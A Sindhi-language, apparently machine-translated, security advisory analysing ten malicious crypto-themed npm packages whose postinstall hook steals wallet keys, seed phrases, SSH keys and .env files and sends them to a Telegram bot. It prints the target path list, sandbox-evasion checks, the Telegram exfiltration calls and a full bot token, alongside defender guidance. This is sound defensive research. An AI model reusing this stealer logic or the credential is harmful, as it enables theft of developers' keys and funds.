TL، ڊاڪٽر
9 جون 2026 تي هڪ واحد اين پي ايم پبلشر اڪائونٽ، aicrypto-xzggg، موڪليو ويو ڏهه پيڪيجز crypto- ۽ Web3- ذائقي وارن نالن سان — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9، ۽ ڇهه وڌيڪ.
هر پيڪيج هڪ کان ساڳيو پيل لوڊ هلائي ٿو postinstall انسٽال ڪرڻ تي، اهو چيڪ ڪري ٿو ته اهو CI اندر هلي رهيو آهي يا سينڊ باڪس - جيڪڏهن نه، اهو والٽ ڪي اسٽورز، سيڊ-فريز فائلون، SSH ڪيز، ۽ پڙهي ٿو. .env ڇهن بلاڪچين ايڪو سسٽم مان فائلون گڏ ڪري ٿو ۽ انهن کي ٽيليگرام بوٽ ڏانهن منتقل ڪري ٿو.
هڪ واحد اشارو جيڪو هڪ محافظ فوري طور تي ڳولي سگهي ٿو اهو ٽيليگرام بوٽ آئي ڊي آهي. 8227918239.
شدت: نازڪ - دستخطي چاٻين جي سڌي چوري ۽ وصولي جملن کان ڊولپر ورڪ اسٽيشنز.
حملو: اهو ڪيئن ڪم ڪري ٿو
پيڪيجز پاڻ کي بلاڪچين ڊولپر يوٽيلٽيز جي طور تي اشتهار ڏين ٿا. package.json گھٽ ۾ گھٽ آهي ۽ انسٽال لائف سائيڪل کي اسڪرپٽ تي اشارو ڪري ٿو:
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } اسڪرپٽ/postinstall.js هڪ ون لائين شيم آهي جيڪو حقيقي پيل لوڊ لوڊ ڪري ٿو: ضرورت آهي (“../src/index.js”). ڇو ته پوسٽ انسٽال خودڪار طريقي سان هلندو آهي دوران npm انسٽال ڪريو، ڊولپر طرفان ڪوڊ درآمد ڪرڻ جي ضرورت ناهي - پيڪيج کي انحصار واري وڻ ۾ رکڻ ان کي عمل ڪرڻ لاءِ ڪافي آهي.
اندر ۾ قتل جي زنجير ايس آر سي/انڊيڪس.جي ايس چار قدم آهن:
- ماحولياتي چڪاس. هڪ گارڊ فنڪشن اهو فيصلو ڪري ٿو ته هوسٽ هڪ بلڊ ايجنٽ وانگر نظر اچي ٿو يا تجزيو سينڊ باڪس.
- دير. عملدرآمد هڪ جي پويان ملتوي ڪيو ويو آهي سيٽ ٽائيم آئوٽ تقريبن 7.4 سيڪنڊن جو.
- گڏ ڪرڻ. والٽ، ڪي، ۽ ڳجهي فائل رستن جي هڪ مقرر فهرست هلائي ويندي آهي؛ موجوده فائلون قطار ۾ رکيل هونديون آهن.
- خارج ڪرڻ. قطار ۾ رکيل فائلون ٽيليگرام بوٽ ڏانهن موڪليون وينديون آهن، جن کان اڳ هڪ خلاصو پيغام هوندو آهي.
ڪليڪشن ٽارگيٽ لسٽ ۾ ڇهه زنجيرن ۽ عام ڊولپر راز شامل آهن. سنواريل:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local ڪُل ايڪيهه رستا. ڊائريڪٽري جون داخلائون جهڙوڪ ~/.اٿيريم/ڪي اسٽور وڌايو ويو آهي ۽ اندر هر فائل قطار ۾ آهي. ايڪسفلٽريشن سڌو سنئون ٽيليگرام بوٽ API استعمال ڪري ٿو - هڪ پيغام موڪليو هوسٽ ۽ فائل خلاصي سان ڪال ڪريو، پوءِ هڪ دستاويز موڪليو هر فائل لاءِ گھڻ-حصيدار اپلوڊ:
متن
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) ڪوڊ جيڪو خلاصو پيغام گڏ ڪري ٿو اهو لفظي اسٽرنگ سان شروع ٿئي ٿو. ڪرپٽو چوري ڪندڙ، ان کان پوءِ هوسٽ نالو، يوزر نالو، اصل پيڪيج جو نالو، فائل ڳڻپ، ۽ ٽائيم اسٽيمپ.
هتي نئون ڇا آهي؟
فرق ڪندڙ چوري جو طريقو ناهي — اين پي ايم کان ٽيليگرام تي ٻڌل ايڪسفل پوسٽ انسٽال hooks چڱي طرح لٽيل آهي. اهو آهي عملدرآمد گيٽ. ڪجھ به ڪرڻ کان اڳ، پيل لوڊ هڪ فنڪشن کي سڏيندو آهي جيڪو صحيح واپسي ڏئي ٿو جڏهن هوسٽ هڪ CI رنر يا سينڊ باڪس وانگر هوندو آهي، ۽ جڏهن اهو ڪندو آهي ته جلدي واپسي ڏئي ٿو:
متن
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) ڪنٽينر-آءِ ڊي ريگيڪس قابل ذڪر شق آهي: هڪ 12-هڪس-ڪردار هوسٽ نالو ڊفالٽ شڪل آهي جيڪا ڊوڪر هڪ کي تفويض ڪري ٿو ڪتب، تنهن ڪري پيل لوڊ "منهنجو هوسٽ نالو ڊوڪر ڪنٽينر وانگر نظر اچي ٿو" کي غير فعال رهڻ جي سبب طور سمجهي ٿو. ست سيڪنڊن جي دير سان گڏ، ڊيزائن ڊولپر جي حقيقي ورڪ اسٽيشن تي هلڻ ۽ ڪٿي به خاموش رهڻ جي حق ۾ آهي جيڪو خودڪار تجزيي وانگر نظر اچي ٿو. اهو گيٽ اهو آهي جيڪو متحرڪ تجزيي سگنلن کي دٻايو ۽ جامد ايڪسفل وهڪري کي بنيادي سزا جي ثبوت طور رکيو.
مقرر وقت
| تاريخ (UTC) | واقعي |
|---|---|
| 2026-06-09 ~02:48 | ڪلسٽر ۾ پهرين پيڪيجز کي اشاعت تي نشان لڳايو ويو (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | اعليٰ نسخي وارن ميمبرن کي نشان لڳايو ويو (ethereum-kit-9 1.25.36 تي wallet-sdk-9 (3.7.73 تي) |
| 2026-06-09 ~03:58–03:59 | آخري ميمبرن کي نشان لڳايو ويو (defi-tools-39 4.26.29 تي swap-sdk-87 4.63.78 تي farming-tools-12 (4.68.54 تي) |
| 2026-06-09 | سڀئي ڏهه خراب درجه بندي ٿيل ۽ رجسٽري هٽائڻ لاءِ رپورٽ ٿيل |
سڀئي ڏهه تقريباً ستر منٽن اندر ظاهر ٿيا، هڪ اڪائونٽ مان هلندڙ هڪ اسڪرپٽ پبلشنگ جي مطابق.
سمجهوتي جا اشارا
نيٽ ورڪ ۽ رويي جا اشارا (ميزبان کي رد ڪيو ويو):
| اشارو | قدر |
|---|---|
| ايڪسفل اينڊ پوائنٽ | api[.]telegram[.]org (ٽيليگرام بوٽ API) |
| ٽيليگرام بوٽ آئي ڊي | 8227918239 |
| بوٽ ٽوڪن | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| ٽيليگرام چيٽ آئي ڊي | 6433587894 |
| ٿلهو لڳايو | postinstall → scripts/postinstall.js → src/index.js |
| مارڪر اسٽرنگ | CRYPTO STEALER گڏ ڪيل خلاصي پيغام ۾ |
| ناشر | aicrypto-xzggg (اي ميل ۾ بيان ڪيل) vipsyria88@gmail[.]com، غير تصديق ٿيل) |
پيڪيجز ۽ ورجن، هر هڪ پنهنجي SHA-256 سان ايس آر سي/انڊيڪس.جي ايس پيل لوڊ (پي لوڊ ڪم ڪندڙ طور تي هڪجهڙا آهن ۽ صرف ايمبيڊڊ پيڪيج-نيم ليبل ۾ مختلف آهن، تنهنڪري هر هيش الڳ آهي):
| پئڪيج | نسخو | src/index.js جو SHA-256 |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
هڪ سادي شڪار جو سوال: ڏهن نالن مان ڪنهن به لاءِ انسٽال لاگز ۽ لاڪ فائلز ڳوليو، ۽ بلڊ يا ڊولپر هوسٽز کان ٽيليگرام بوٽ API سان ڪنيڪشن لاءِ آئوٽ بائونڊ ٽرئفڪ ڳوليو جيڪي ٻي صورت ۾ ان کي استعمال نٿا ڪن.
منسوب ۽ مشاهدو ڪيل رويو
سڀئي ڏهه پيڪيج هڪ اڪائونٽ پاران شايع ڪيا ويا، ايڪريپٽو-xzggg، جنهن جو بيان ڪيل اي ميل آهي vipsyria88@gmail[.]com. رجسٽري ميٽا ڊيٽا ۾ اي ميل ۽ سورس ڪنٽرول لنڪ ٻئي غير تصديق ٿيل آهن، ۽ اڪائونٽ ۾ سخت منفي شهرت جو اسڪور آهي. اسان تصديق نه ڪئي آهي ته اڪائونٽ ڪير هلائي ٿو.
ڪنهن به سڃاڻپ جي دعويٰ کان ٻه تفصيل الڳ ڪرڻ جي لائق آهن. پهريون، package.json ليکڪ فيلڊ ريڊس اليڪس سمٿ هر پيڪيج تي، جڏهن ته اصل اشاعت جو کاتو آهي ايڪريپٽو-xzggg؛ ليکڪ فيلڊ خود اعلان ڪيل ميٽا ڊيٽا آهي ۽ تصنيف قائم نٿو ڪري. ٻيو، نسخي جا نمبر وڏي پيماني تي مختلف آهن - ڪجهه ميمبر 1.0.0، ٻيا تي 4.68.54 - جيڪو حقيقي رليز جي تاريخن کي برقرار رکڻ جي بجاءِ تازو ٺهيل پيڪيج نالن تي هڪ واحد پيل لوڊ کي ٻيهر استعمال ڪرڻ سان مطابقت رکي ٿو.
ڪلسٽر ۾ رويو هڪجهڙو آهي: ساڳي ٽارگيٽ رستو لسٽ، ساڳي ٽيليگرام بوٽ آئي ڊي ۽ چيٽ آئي ڊي، ساڳي ماحول گيٽ، ساڳي ڪرپٽو چوري ڪندڙ مارڪر. اها هڪجهڙائي پيڪيجز جي وچ ۾ مضبوط ترين ڪڙي آهي. اهو هڪجهڙو آپريٽر سگنل آهي، سڃاڻپ نه.
اثر، رجحانات ۽ محافظن لاءِ رهنمائي
نمائش ڪنڪريٽ آهي. هڪ ڊولپر جيڪو انهن مان ڪنهن به پيڪيج کي هڪ ورڪ اسٽيشن تي انسٽال ڪري ٿو جيڪو هڪ سافٽ ويئر والٽ، هڪ سيڊ-فريز فائل، يا هڪ SSH ڪي رکي ٿو، انهن فائلن کي سيڪنڊن اندر هوسٽ کان پڙهي ۽ منتقل ڪري ٿو. بحالي جا جملا ۽ سائننگ ڪيز سيشن ٽوڪن وانگر ختم نه ٿيندا آهن؛ هڪ ڀيرو يادگيري.txt يا سولانا آئي ڊي. جيسن مشين ڇڏيندي، ان جي ڪنٽرول ۾ موجود فنڊ خطري ۾ هوندا آهن جيستائين اهي منتقل نه ٿين. ساڳيو رن پڻ قبضو ڪري ٿو .env فائلون، جيڪي باقاعده طور تي API ڪيز ۽ ڊيٽابيس سندون کڻنديون آهن.
هن ڪلسٽر جي پويان ٻه رجحان آهن. پهريون هڪ مخصوص سامعين کي راغب ڪرڻ لاءِ ڪرپٽو ۽ ويب 3-ٿيمڊ نالن جو مسلسل استعمال آهي - ڊولپر جيڪي والٽ ۽ ڪيز کي ساڳئي مشين تي رکندا آهن جنهن تي اهي انحصار انسٽال ڪندا آهن. ٻيو انسٽال ٽائيم پيل لوڊ ۾ سينڊ باڪس جي چوري جي پختگي آهي. هڪ گيٽ جيڪو CI ماحول جي متغيرن، رنر يوزر نيم، ۽ ڊاڪر ڪنٽينر-آئي ڊي هوسٽ نالي جي شڪل جي جانچ ڪري ٿو اهو هڪ حقيقي ورڪ اسٽيشن جي ڀيٽ ۾ تجزيي هيٺ مختلف طريقي سان عمل ڪرڻ جي هڪ جان بوجھ ڪوشش آهي، ۽ اهو خالص متحرڪ ڳولا لاءِ بار وڌائي ٿو.
محافظن لاءِ:
ڊفالٽ طور تي غير فعال اسڪرپٽ سان انسٽال ڪريو. npm انسٽال ڪريو - نظرانداز ڪريو-اسڪرپٽ، يا سيٽ ڪريو نظرانداز-اسڪرپٽ = سچو in .npmrc، روڪي ٿو پوسٽ انسٽال عملدرآمد؛ صرف مخصوص انحصارن لاءِ اسڪرپٽ کي فعال ڪريو جن کي واقعي انهن جي ضرورت آهي.
والٽ ۽ سائننگ ڪيز کي بلڊ ۽ ڊولپمينٽ مشينن کان پري رکو. هارڊويئر والٽ يا وقف ٿيل، انحصار کان پاڪ سائننگ هوسٽ استعمال ڪريو.
علاج ڪريو .env، ڪي اسٽور، ۽ سيڊ-جملي فائلون تاج جي زيورن وانگر. انهن کي ڪڏهن به اهڙي ڊائريڪٽري ۾ نه ويهڻ گهرجي جيڪا هڪ npm انسٽال ڪريو ڪم ڪندڙ وڻ.
سي آءِ ۽ ڊولپر هوسٽز کان ٽيليگرام بوٽ API سان آئوٽ بائونڊ ڪنيڪشن جي ڳولا ڪريو. گھڻا بلڊ ماحول ڪڏهن به اهو نه سڏيندا آهن؛ هڪ جيڪو اوچتو انسٽاليشن کان پوءِ ٿئي ٿو، اهو جاچڻ جي لائق آهي.
پن ڪريو ۽ انحصار جو جائزو وٺو. هڪ نئون پيڪيج هڪ عام ڪرپٽو نالي سان، هڪ پوسٽ انسٽال ٿلهو، ۽ ڪو به ريپوزٽري لنڪ لاڪ فائل ۾ داخل ٿيڻ کان اڳ ڏسڻ جي ضرورت ناهي.
ڪنٽينر-آءِ ڊي چوري جي شق پڻ تجزيه نگارن لاءِ هڪ ياد ڏياريندڙ آهي: هڪ انسٽال-ٽائيم پيل لوڊ جيڪو سينڊ باڪس ۾ غير فعال رهي ٿو اهو نرم نه آهي، اهو چونڊيل آهي. انسٽال جي رستي جو جامد جائزو اهو ڏسڻ لاءِ قابل اعتماد طريقو رهي ٿو ته ڪهڙي متحرڪ عمل کي ڏيکارڻ ۾ گهٽتائي ٿي سگهي ٿي.
حوالا
npm انسٽال دستاويز - لائف سائيڪل اسڪرپٽ ۽ -اسڪرپٽ کي نظرانداز ڪريو— خودڪار انسٽال کي غير فعال ڪرڻ لاءِ حوالو hooks.





